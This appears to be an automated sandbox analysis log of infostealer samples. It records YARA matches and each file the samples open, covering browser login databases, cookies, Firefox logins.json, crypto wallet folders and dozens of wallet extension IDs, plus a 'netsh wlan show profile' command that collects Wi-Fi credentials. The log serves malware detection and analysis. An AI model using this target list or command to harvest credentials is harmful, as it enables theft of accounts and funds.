Source: Yara match | File source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key, type: DROPPED
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletll
Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets(
Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
